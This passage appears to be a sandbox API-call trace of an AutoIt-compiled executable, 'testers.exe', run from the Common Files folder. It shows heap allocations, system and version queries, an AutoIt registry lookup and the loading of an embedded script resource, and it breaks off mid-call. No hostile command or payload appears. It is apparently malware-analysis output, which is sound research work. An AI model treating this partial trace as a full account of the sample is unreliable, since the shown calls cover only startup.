\x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿªï×\r\x8cû\x89", lpUsedDefaultChar=0x0) returned 256 [0251.267] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0251.267] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x2c4d1c) returned 0x0 [0251.268] RtlSizeHeap (HeapHandle=0xc60000, Flags=0x0, MemoryPointer=0xc83138) returned 0x80 [0251.268] RtlSizeHeap (HeapHandle=0xc60000, Flags=0x0, MemoryPointer=0xc83138) returned 0x80 [0251.269] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x3c) returned 0xc72240 [0251.269] RtlSizeHeap (HeapHandle=0xc60000, Flags=0x0, MemoryPointer=0xc83138) returned 0x80 [0251.269] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xc73300 [0251.269] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xc72a80 [0251.269] GetVersionExW (in: lpVersionInformation=0x89fa68*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x1f1e1d1c, dwMinorVersion=0x23222120, dwBuildNumber=0x27262524, dwPlatformId=0xb1000f, szCSDVersion="\x04") | out: lpVersionInformation=0x89fa68*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0251.269] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc73300 | out: hHeap=0xc60000) returned 1 [0251.269] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xc7fbc0 [0251.269] GetCurrentProcess () returned 0xffffffff [0251.269] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x89fbb8 | out: Wow64Process=0x89fbb8) returned 1 [0251.269] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x75990000 [0251.270] GetProcAddress (hModule=0x75990000, lpProcName="GetNativeSystemInfo") returned 0x759b10b5 [0251.270] GetNativeSystemInfo (in: lpSystemInfo=0x89fb84 | out: lpSystemInfo=0x89fb84*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) [0251.270] FreeLibrary (hLibModule=0x75990000) returned 1 [0251.270] RtlSizeHeap (HeapHandle=0xc60000, Flags=0x0, MemoryPointer=0xc83138) returned 0x80 [0251.270] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xc) returned 0xc73300 [0251.270] RtlSizeHeap (HeapHandle=0xc60000, Flags=0x0, MemoryPointer=0xc83138) returned 0x80 [0251.271] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xc73318 [0251.271] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xc84038 [0251.271] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xc73330 [0251.271] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xc84048 [0251.271] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xc73348 [0251.271] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xc84058 [0251.271] RtlSizeHeap (HeapHandle=0xc60000, Flags=0x0, MemoryPointer=0xc83138) returned 0x80 [0251.271] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xc73360 [0251.271] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xc84068 [0251.271] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xc73378 [0251.271] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xc84078 [0251.271] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xc73390 [0251.272] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xc85088 [0251.272] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xc733a8 [0251.272] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xc850b0 [0251.272] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xc733c0 [0251.272] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xc850c0 [0251.272] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xc733d8 [0251.272] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xc850d0 [0251.272] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xc733f0 [0251.272] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xc850e0 [0251.272] MapVirtualKeyW (uCode=0x5b, uMapType=0x0) returned 0x5b [0251.272] MapVirtualKeyW (uCode=0x10, uMapType=0x0) returned 0x2a [0251.272] MapVirtualKeyW (uCode=0xa0, uMapType=0x0) returned 0x2a [0251.272] MapVirtualKeyW (uCode=0xa1, uMapType=0x0) returned 0x36 [0251.272] MapVirtualKeyW (uCode=0x11, uMapType=0x0) returned 0x1d [0251.272] MapVirtualKeyW (uCode=0x12, uMapType=0x0) returned 0x38 [0251.272] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xc73408 [0251.272] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xc850f0 [0251.272] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xc854b0 [0251.272] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xc85100 [0251.272] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xc854c8 [0251.272] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xc85110 [0251.272] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xc854e0 [0251.273] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xc85120 [0251.273] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xc854f8 [0251.273] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xc85130 [0251.273] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xc85510 [0251.273] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xc85140 [0251.273] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xc85528 [0251.273] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xc85150 [0251.273] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xc85540 [0251.273] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xc85160 [0251.273] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xc85558 [0251.273] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xc85170 [0251.273] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xc85570 [0251.273] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xc85180 [0251.273] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xc85190 [0251.273] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xc85588 [0251.273] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xc851a0 [0251.273] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xc855a0 [0251.273] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xc851b0 [0251.273] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xc855b8 [0251.273] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xc851c0 [0251.273] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xc855d0 [0251.273] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xc851d0 [0251.273] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xc855e8 [0251.273] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xc851e0 [0251.273] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xc851f0 [0251.274] RegisterClipboardFormatW (lpszFormat="WM_GETCONTROLNAME") returned 0xc11e [0251.274] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xc85600 [0251.274] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xc85200 [0251.274] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x40) returned 0xc72288 [0251.274] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0251.274] OleInitialize (pvReserved=0x0) returned 0x0 [0251.284] RtlSizeHeap (HeapHandle=0xc60000, Flags=0x0, MemoryPointer=0xc83138) returned 0x80 [0251.284] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xc85618 [0251.284] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xc85220 [0251.284] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Control Panel\\Mouse", ulOptions=0x0, samDesired=0x1, phkResult=0x89fb8c | out: phkResult=0x89fb8c*=0xf8) returned 0x0 [0251.285] RegQueryValueExW (in: hKey=0xf8, lpValueName="SwapMouseButtons", lpReserved=0x0, lpType=0x0, lpData=0x89fba8, lpcbData=0x89fb90*=0x8 | out: lpType=0x0, lpData=0x89fba8*=0x30, lpcbData=0x89fb90*=0x4) returned 0x0 [0251.285] RegCloseKey (hKey=0xf8) returned 0x0 [0251.285] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xc86390 [0251.285] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xc85230 [0251.285] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xc85240 [0251.286] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xc85250 [0251.287] RtlSizeHeap (HeapHandle=0xc60000, Flags=0x0, MemoryPointer=0xc83138) returned 0x80 [0251.287] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xc85648 [0251.287] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xc85260 [0251.287] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xc863b8 [0251.287] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xc85270 [0251.287] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xc85660 [0251.287] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xc85280 [0251.287] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xc85678 [0251.287] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xc85290 [0251.287] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xc85690 [0251.287] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xc852a0 [0251.287] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xc856a8 [0251.287] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xc852b0 [0251.287] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xc856c0 [0251.287] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xc852c0 [0251.287] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xc856d8 [0251.287] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xc852d0 [0251.287] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xc856f0 [0251.288] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xc852e0 [0251.288] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xc85708 [0251.288] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xc852f0 [0251.288] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xc85720 [0251.288] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xc85300 [0251.288] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xc85738 [0251.288] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xc85310 [0251.288] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xc85750 [0251.288] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xc85320 [0251.288] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xc85768 [0251.288] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xc85330 [0251.288] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xc85780 [0251.288] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xc85340 [0251.288] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xc85798 [0251.288] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xc85350 [0251.288] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xc857b0 [0251.288] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xc85360 [0251.288] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xc857c8 [0251.288] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xc85370 [0251.288] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xc857e0 [0251.288] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xc85380 [0251.288] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xc857f8 [0251.288] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xc85390 [0251.289] RtlSizeHeap (HeapHandle=0xc60000, Flags=0x0, MemoryPointer=0xc83138) returned 0x80 [0251.289] RtlSizeHeap (HeapHandle=0xc60000, Flags=0x0, MemoryPointer=0xc83138) returned 0x80 [0251.291] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xc85810 [0251.291] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xc853a0 [0251.293] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x87fb60, nSize=0x7fff | out: lpFilename="C:\\PROGRA~2\\COMMON~1\\testers.exe" (normalized: "c:\\progra~2\\common~1\\testers.exe")) returned 0x20 [0251.293] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x50) returned 0xc8a578 [0251.293] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xc853b0 [0251.296] GetFullPathNameW (in: lpFileName="C:\\PROGRA~2\\COMMON~1\\testers.exe", nBufferLength=0x7fff, lpBuffer=0x86fb50, lpFilePart=0x0 | out: lpBuffer="C:\\PROGRA~2\\COMMON~1\\testers.exe", lpFilePart=0x0) returned 0x20 [0251.296] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc85810 | out: hHeap=0xc60000) returned 1 [0251.296] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x50) returned 0xc8a5d0 [0251.296] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc8a578 | out: hHeap=0xc60000) returned 1 [0251.296] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc853b0 | out: hHeap=0xc60000) returned 1 [0251.296] GetFullPathNameW (in: lpFileName="C:\\PROGRA~2\\COMMON~1\\testers.exe", nBufferLength=0x7fff, lpBuffer=0x87fb6c, lpFilePart=0x88fb6c | out: lpBuffer="C:\\PROGRA~2\\COMMON~1\\testers.exe", lpFilePart=0x88fb6c*="testers.exe") returned 0x20 [0251.296] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xc863e0 [0251.296] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xc85810 [0251.296] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xc85828 [0251.296] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xc853b0 [0251.296] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\AutoIt v3\\AutoIt", ulOptions=0x0, samDesired=0x1, phkResult=0x88fb88 | out: phkResult=0x88fb88*=0x0) returned 0x2 [0251.296] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc85828 | out: hHeap=0xc60000) returned 1 [0251.296] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc853b0 | out: hHeap=0xc60000) returned 1 [0251.297] RtlSizeHeap (HeapHandle=0xc60000, Flags=0x0, MemoryPointer=0xc83138) returned 0x80 [0251.297] RtlSizeHeap (HeapHandle=0xc60000, Flags=0x0, MemoryPointer=0xc83138) returned 0x80 [0251.297] RtlSizeHeap (HeapHandle=0xc60000, Flags=0x0, MemoryPointer=0xc83138) returned 0x80 [0251.298] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xc85828 [0251.298] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xc853b0 [0251.298] RtlSizeHeap (HeapHandle=0xc60000, Flags=0x0, MemoryPointer=0xc83138) returned 0x80 [0251.298] IsThemeActive () returned 0x1 [0251.298] SystemParametersInfoW (in: uiAction=0x2000, uiParam=0x0, pvParam=0x89fbac, fWinIni=0x0 | out: pvParam=0x89fbac) returned 1 [0251.298] SystemParametersInfoW (in: uiAction=0x2001, uiParam=0x0, pvParam=0x0, fWinIni=0x2 | out: pvParam=0x0) returned 0 [0251.299] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xc85840 [0251.299] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xc853c0 [0251.299] GetCurrentDirectoryW (in: nBufferLength=0x7fff, lpBuffer=0x88fb80 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0251.299] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xc85858 [0251.299] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xc853d0 [0251.299] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x86fae0, nSize=0x7fff | out: lpFilename="C:\\PROGRA~2\\COMMON~1\\testers.exe" (normalized: "c:\\progra~2\\common~1\\testers.exe")) returned 0x20 [0251.299] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x50) returned 0xc8a578 [0251.299] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xc853e0 [0251.301] GetFullPathNameW (in: lpFileName="C:\\PROGRA~2\\COMMON~1\\testers.exe", nBufferLength=0x7fff, lpBuffer=0x85fad0, lpFilePart=0x0 | out: lpBuffer="C:\\PROGRA~2\\COMMON~1\\testers.exe", lpFilePart=0x0) returned 0x20 [0251.301] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc73348 | out: hHeap=0xc60000) returned 1 [0251.301] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x50) returned 0xc8a628 [0251.301] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc8a578 | out: hHeap=0xc60000) returned 1 [0251.301] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc853e0 | out: hHeap=0xc60000) returned 1 [0251.301] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x40) returned 0xc722d0 [0251.301] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xc853e0 [0251.301] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x75990000 [0251.301] GetProcAddress (hModule=0x75990000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x759bd650 [0251.301] Wow64DisableWow64FsRedirection (in: OldValue=0x87fae4 | out: OldValue=0x87fae4*=0x0) returned 1 [0251.301] FreeLibrary (hLibModule=0x75990000) returned 1 [0251.301] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x18) returned 0xc8a578 [0251.302] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\testers.exe" (normalized: "c:\\progra~2\\common~1\\testers.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x87f980, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xf8 [0251.302] GetFileType (hFile=0xf8) returned 0x1 [0251.302] LoadLibraryExW (lpLibFileName="C:\\PROGRA~2\\COMMON~1\\testers.exe", hFile=0x0, dwFlags=0x2) returned 0x290000 [0251.303] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x75990000 [0251.303] GetProcAddress (hModule=0x75990000, lpProcName="Wow64RevertWow64FsRedirection") returned 0x759bd668 [0251.303] Wow64RevertWow64FsRedirection (OlValue=0x0) returned 1 [0251.303] FreeLibrary (hLibModule=0x75990000) returned 1 [0251.303] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10000) returned 0xc8a680 [0251.303] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xc853f0 [0251.304] CreateStreamOnHGlobal (in: hGlobal=0x0, fDeleteOnRelease=1, ppstm=0x87fb40 | out: ppstm=0x87fb40*=0xc86430) returned 0x0 [0251.305] FindResourceExW (hModule=0x290000, lpType=0xa, lpName="SCRIPT", wLanguage=0x0) returned 0x358528 [0251.305] LoadResource (hModule=0x290000, hResInfo=0x358528) returned 0x3607b8 [0251.305] SizeofResource (hModule=0x290000, hResInfo=0x358528) returned 0x93fa [0251.305] LockResource (hResData=0x3607b8) returned 0x3607b8 [0251.305] ISequentialStream:RemoteWrite (in: This=0xc86430, pv=0x3607b8*=0xa3, cb=0x93fa, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0251.320] IStream:RemoteSeek (in: This=0xc86430, dlibMove=0x0, dwOrigin=0x0, plibNewPosition=0x0 | out: plibNewPosition=0x0) returned 0x0 [0251.321] IStream:RemoteSeek (in: This=0xc86430, dlibMove=0x0, dwOrigin=0x0, plibNewPosition=0x1 | out: plibNewPosition=0x1) returned 0x0 [0251.321] ISequentialStream:RemoteRead (in: This=0xc86430, pv=0xc8a680, cb=0x18, pcbRead=0x87fa6c | out: pv=0xc8a680*=0xa3, pcbRead=0x87fa6c*=0x18) returned 0x0 [0251.321] IStream:RemoteSeek (in: This=0xc86430, dlibMove=0x14, dwOrigin=0x0, plibNewPosition=0x0 | out: plibNewPosition=0x0) returned 0x0 [0251.321] ISequentialStream:RemoteRead (in: This=0xc86430, pv=0x87fab0, cb=0x4, pcbRead=0x87fa6c | out: pv=0x87fab0*=0x45, pcbRead=0x87fa6c*=0x4) returned 0x0 [0251.321] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc853f0 | out: hHeap=0xc60000) returned 1 [0251.321] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc8a680 | out: hHeap=0xc60000) returned 1 [0251.321] ISequentialStream:RemoteRead (in: This=0xc86430, pv=0x87fad4, cb=0x10, pcbRead=0x87faac | out: pv=0x87fad4*=0x4d, pcbRead=0x87faac*=0x10) returned 0x0 [0251.321] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x87f9a8 | out: lpSystemTimeAsFileTime=0x87f9a8*(dwLowDateTime=0x37564710, dwHighDateTime=0x1d661be)) [0251.321] IStream:RemoteSeek (in: This=0xc86430, dlibMove=0x0, dwOrigin=0x0, plibNewPosition=0x1 | out: plibNewPosition=0x1) returned 0x0 [0251.321] IStream:RemoteSeek (in: This=0xc86430, dlibMove=0x28, dwOrigin=0x0, plibNewPosition=0x0 | out: plibNewPosition=0x0) returned 0x0 [0251.321] ISequentialStream:RemoteRead (in: This=0xc86430, pv=0x87f428, cb=0x4, pcbRead=0x87f1ec | out: pv=0x87f428*=0x6b, pcbRead=0x87f1ec*=0x4) returned 0x0 [0251.321] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x87f0e8 | out: lpSystemTimeAsFileTime=0x87f0e8*(dwLowDateTime=0x37564710, dwHighDateTime=0x1d661be)) [0251.321] ISequentialStream:RemoteRead (in: This=0xc86430, pv=0x87f430, cb=0x4, pcbRead=0x87f1ec | out: pv=0x87f430*=0xa6, pcbRead=0x87f1ec*=0x4) returned 0x0 [0251.321] ISequentialStream:RemoteRead (in: This=0xc86430, pv=0x87f218, cb=0x34, pcbRead=0x87f1ec | out: pv=0x87f218*=0xe1, pcbRead=0x87f1ec*=0x34) returned 0x0 [0251.321] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x87f0e8 | out: lpSystemTimeAsFileTime=0x87f0e8*(dwLowDateTime=0x37564710, dwHighDateTime=0x1d661be)) [0251.321] ISequentialStream:RemoteRead (in: This=0xc86430, pv=0x87f430, cb=0x4, pcbRead=0x87f1ec | out: pv=0x87f430*=0x17, pcbRead=0x87f1ec*=0x4) returned 0x0 [0251.321] ISequentialStream:RemoteRead (in: This=0xc86430, pv=0x87f45c, cb=0x6e, pcbRead=0x87f1ec | out: pv=0x87f45c*=0xf9, pcbRead=0x87f1ec*=0x6e) returned 0x0 [0251.321] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x87f0e8 | out: 